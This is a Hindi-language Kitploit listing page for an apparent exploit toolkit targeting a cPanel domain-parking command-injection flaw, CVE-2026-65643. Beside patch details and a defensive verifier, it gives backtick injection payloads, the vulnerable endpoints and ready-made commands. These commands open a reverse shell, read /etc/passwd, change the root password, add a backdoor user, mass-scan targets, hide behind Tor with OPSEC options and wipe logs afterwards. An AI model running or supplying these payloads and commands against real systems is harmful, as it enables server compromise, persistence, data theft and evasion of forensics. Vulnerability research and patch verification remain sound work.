Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/tc4dy/cve-2026-65643-poc-toolkit
विशेषाधिकार वृद्धिभेद्यता स्कैनरस्थायित्व तंत्रशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
पेलोड डेवलपमेंट
GitHubtc4dy/cve-2026-65643-poc-toolkit

CVE-2026-65643-PoC-Toolkit

रेड/ब्लू टीम टूलकिट CVE-2026-65643 के लिए, जो cPanel डोमेन पार्किंग RCE है। इसमें रिवर्स शेल, वेबशेल, पर्सिस्टेंस और मास स्कैनिंग के साथ एक्सप्लॉइट शामिल है, साथ ही डिटेक्शन और ऑडिटिंग के लिए एक गैर-आक्रामक वेरिफायर भी है।

रिपॉजिटरी देखें
1 दिन पहलेअभी तक समीक्षित नहीं

CVEPoC

CVE‑2026‑65643 – cPanel डोमेन पार्किंग RCE टूलकिट

Python 3.8+ CVSS Author cPanel

⚠️ केवल नैतिक उपयोग – अधिकृत सुरक्षा परीक्षण यह रिपॉजिटरी केवल अधिकृत सुरक्षा पेशेवरों, ब्लू टीमों और पेनिट्रेशन टेस्टर्स के लिए उपकरण प्रदान करती है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच CFAA (अमेरिका), कंप्यूटर मिसयूज़ एक्ट (यूके), TCK 243/244 (तुर्की), और दुनिया भर के समान कानूनों के तहत अवैध है।


📖 भेद्यता अवलोकन

CVE‑2026‑65643 cPanel और WHM संस्करण 11.x में एक गंभीर कमांड इंजेक्शन भेद्यता है जो एक प्रमाणित cPanel उपयोगकर्ता को डोमेन पार्किंग कार्यक्षमता के माध्यम से रूट विशेषाधिकारों के साथ मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देती है।

यह कैसे काम करता है

  1. प्रमाणित पहुंच आवश्यक – हमलावर के पास लक्ष्य सर्वर पर एक वैध cPanel खाता (उपयोगकर्ता नाम/पासवर्ड) होना चाहिए।
  2. डोमेन पार्किंग इंजेक्शन – पार्क किया गया डोमेन जोड़ते समय, डोमेन नाम को ठीक से सैनिटाइज़ नहीं किया जाता है, जिससे हमलावर बैकटिक्स (`) का उपयोग करके शेल कमांड इंजेक्ट कर सकता है।
  3. कमांड निष्पादन – इंजेक्ट किया गया कमांड cPanel उपयोगकर्ता के विशेषाधिकारों के साथ सिस्टम द्वारा निष्पादित किया जाता है, जिसे विशेषाधिकार वृद्धि तकनीकों के माध्यम से रूट तक बढ़ाया जा सकता है।
  4. रूट विशेषाधिकार – क्योंकि डोमेन पार्किंग ऑपरेशन पर्याप्त अनुमतियों के साथ चलता है, उच्च विशेषाधिकारों के साथ मनमाने कमांड निष्पादित किए जा सकते हैं।
  5. प्रभाव – पूर्ण सर्वर समझौता, डेटा चोरी, बैकडोर, रैनसमवेयर, और पार्श्व गति। तुरंत अपग्रेड करें!

प्रभावित संस्करण

  • cPanel और WHM 11.110.0.140 और पुराने – असुरक्षित
  • 11.134.0.52 और पुराने – असुरक्षित
  • 11.136.0.36 और पुराने – असुरक्षित
  • 11.138.0.1 और पुराने – असुरक्षित
  • 11.138.1.6 और बाद के – पैच किए गए

पैच

  • cPanel और WHM 11.138.1.6, 11.138.0.2, 11.136.0.37, 11.134.0.53, या 11.110.0.141 या नए संस्करण में अपग्रेड करें।
  • यदि अपग्रेड संभव नहीं है, तो अस्थायी समाधान के रूप में cPanel उपयोगकर्ताओं के लिए डोमेन पार्किंग अनुमतियों को अक्षम करें।

🧰 उपकरण

उपकरणउद्देश्यइच्छित उपयोगकर्ता
exploit.pyरिवर्स शेल, वेबशेल, स्थिरता, फ़ाइल पढ़ना/लिखना, रूट पासवर्ड परिवर्तन, बड़े पैमाने पर स्कैनिंग, Tor समर्थन, और OPSEC सुविधाओं के साथ पूर्ण हथियारयुक्त टूलकिट।

📊 फीचर तुलना


🎯 उपयोग केस सारांश


⚙️ स्थापना

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3

📋 पैरामीटर

exploit.py पैरामीटर

verifier.py पैरामीटर


💥 परिदृश्य


🧪 एंडपॉइंट और इंजेक्शन विधियाँ

शोषण निम्नलिखित cPanel एंडपॉइंट और इंजेक्शन विधियों का उपयोग करता है:

पेलोड प्रारूप

root@kitploit:~
# इंजेक्शन पेलोड प्रारूप
test.com`<command>`

# उदाहरण
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`

🛡️ जिम्मेदार उपयोग

  • इन उपकरणों का उपयोग केवल उन सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
  • अनधिकृत पहुंच अवैध और अनैतिक है।
  • लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।
  • हमेशा अपने देश के कानूनों और विनियमों का पालन करें।

यह सॉफ़्टवेयर केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।

टूल डाउनलोड करें
रेड टीम / अधिकृत पेनटेस्टर
verifier.pyगैर-आक्रामक भेद्यता जांचकर्ता जो cPanel संस्करण का पता लगाता है, इंजेक्शन को मान्य करता है, और बिना किसी दुर्भावनापूर्ण पेलोड को निष्पादित किए जोखिम का आकलन करता है। विस्तृत रिपोर्ट उत्पन्न करता है।ब्लू टीम / सुरक्षा ऑडिटर
फीचरexploit.pyverifier.py
भेद्यता का पता लगाना✅✅
संस्करण का पता लगाना (4 एंडपॉइंट)✅✅
कमांड इंजेक्शन✅❌
रिवर्स शेल✅❌
वेबशेल अपलोड✅❌
स्थिरता (cPanel उपयोगकर्ता निर्माण)✅❌
रूट पासवर्ड परिवर्तन✅❌
फ़ाइल पढ़ना/लिखना✅❌
4 इंजेक्शन विधियाँ (JSON/Form/CGI/API2)✅✅
Tor समर्थन (गुमनामी)✅❌
User‑Agent रोटेशन (OPSEC)✅❌
जिटर (OPSEC)✅❌
बड़े पैमाने पर स्कैनिंग (मल्टी-थ्रेड)✅❌
इंटरैक्टिव शेल✅❌
गैर-आक्रामक (सुरक्षित) मोड❌✅
टाइमलाइन लॉगिंग✅✅
HTML रिपोर्ट✅❌
JSON रिपोर्ट✅✅
लॉग सफाई (एंटी-फोरेंसिक)✅✅
प्रॉक्सी समर्थन✅✅
कस्टम User‑Agent✅✅
SSL सत्यापन नियंत्रण✅✅
परिदृश्यअनुशंसित उपकरण
ब्लू टीम – जाँच करना कि आपका cPanel इंस्टॉलेशन असुरक्षित है या नहींverifier.py
सुरक्षा ऑडिट – गैर-आक्रामक भेद्यता मूल्यांकनverifier.py
रेड टीम – पूर्ण शोषण के साथ अधिकृत पेनिट्रेशन परीक्षणexploit.py
बग बाउंटी – जिम्मेदार प्रकटीकरण परीक्षणverifier.py
बड़े पैमाने पर स्कैनिंग – कई लक्ष्यों की भेद्यता की जाँचexploit.py (केवल पता लगाना)
घटना प्रतिक्रिया – जाँच करना कि सिस्टम समझौता किए गए हैं या नहींverifier.py
पैरामीटरविवरण
-t, --targetलक्ष्य cPanel URL (जैसे https://cpanel.example.com:2083)
-l, --target-fileबड़े पैमाने पर स्कैनिंग के लिए लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक)
-u, --usernamecPanel उपयोगकर्ता नाम
-P, --passwordcPanel पासवर्ड
-p, --portcPanel पोर्ट ओवरराइड करें (URL से डिफ़ॉल्ट या 2083)
--threadsमल्टी-टारगेट के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 10)
-o, --outputJSON रिपोर्ट को फ़ाइल में सहेजें
--html-reportHTML रिपोर्ट को फ़ाइल में सहेजें
-v, --verboseविस्तृत आउटपुट
--proxyHTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080)
--torTor के माध्यम से रूट करें (localhost:9050)
-ua, --user-agentकस्टम User‑Agent
--no-keep-aliveसत्र को सक्रिय न रखें
--delayअनुरोधों के बीच देरी (डिफ़ॉल्ट: 2.0s)
--jitterअनुरोधों के बीच यादृच्छिक जिटर (0‑1 सेकंड) (डिफ़ॉल्ट: 0.5)
--max-retriesअधिकतम पुनः प्रयास (डिफ़ॉल्ट: 5)
--ssl-verifySSL प्रमाणपत्र सत्यापित करें
--timeoutअनुरोध टाइमआउट (डिफ़ॉल्ट: 15s)
--cmdलक्ष्य पर एकल कमांड निष्पादित करें
--reverse-shellरिवर्स शेल IP:PORT
--passwdरूट पासवर्ड बदलें
--addusercPanel उपयोगकर्ता बनाएं (USER DOMAIN PASSWORD)
--readफ़ाइल पढ़ें
--writeफ़ाइल लिखें (पथ निर्दिष्ट करें)
--write-contentलिखने के लिए सामग्री
--cleanupशोषण के बाद लॉग और इतिहास साफ़ करें
-i, --interactiveशोषण के बाद इंटरैक्टिव शेल
--domain-suffixपार्क किए गए डोमेन के लिए सफ़िक्स (डिफ़ॉल्ट: exploit.local)
पैरामीटरविवरण
-t, --targetलक्ष्य cPanel URL (जैसे https://cpanel.example.com:2083)
-u, --usernamecPanel उपयोगकर्ता नाम
-P, --passwordcPanel पासवर्ड
-o, --outputJSON रिपोर्ट को फ़ाइल में सहेजें
-v, --verboseविस्तृत आउटपुट
--proxyHTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080)
--torTor के माध्यम से रूट करें (localhost:9050)
--ssl-verifySSL प्रमाणपत्र सत्यापित करें
--timeoutअनुरोध टाइमआउट (डिफ़ॉल्ट: 15s)
--cleanupपरीक्षण के बाद लॉग साफ़ करें
#परिदृश्यकमांड
1त्वरित भेद्यता जाँचpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass
2रिपोर्ट के साथ विस्तृत स्कैनpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v
3रिवर्स शेलpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4कमांड निष्पादित करेंpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami"
5संवेदनशील फ़ाइल पढ़ेंpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6रूट पासवर्ड बदलेंpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7नया cPanel उपयोगकर्ता बनाएं (स्थिरता)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8शोषण के बाद इंटरैक्टिव शेलpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9फ़ाइल से बड़े पैमाने पर स्कैनिंगpython exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json
10प्रॉक्सी, Tor, और कस्टम User‑Agent का उपयोग करेंpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0"
11शोषण के बाद लॉग साफ़ करेंpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup
विधिएंडपॉइंटविवरण
JSON API/cpsessXXXXX/json-api/domainJSON पेलोड के माध्यम से प्राथमिक इंजेक्शन विधि
फ़ॉर्म डेटा/cpsessXXXXX/json-api/domainफ़ॉर्म-एन्कोडेड डेटा के माध्यम से वैकल्पिक इंजेक्शन
CGI स्क्रिप्ट/cgi-sys/domainpark.cgiलीगेसी CGI एंडपॉइंट इंजेक्शन
API2/cpsessXXXXX/json-api/cpanelलीगेसी API2 इंजेक्शन विधि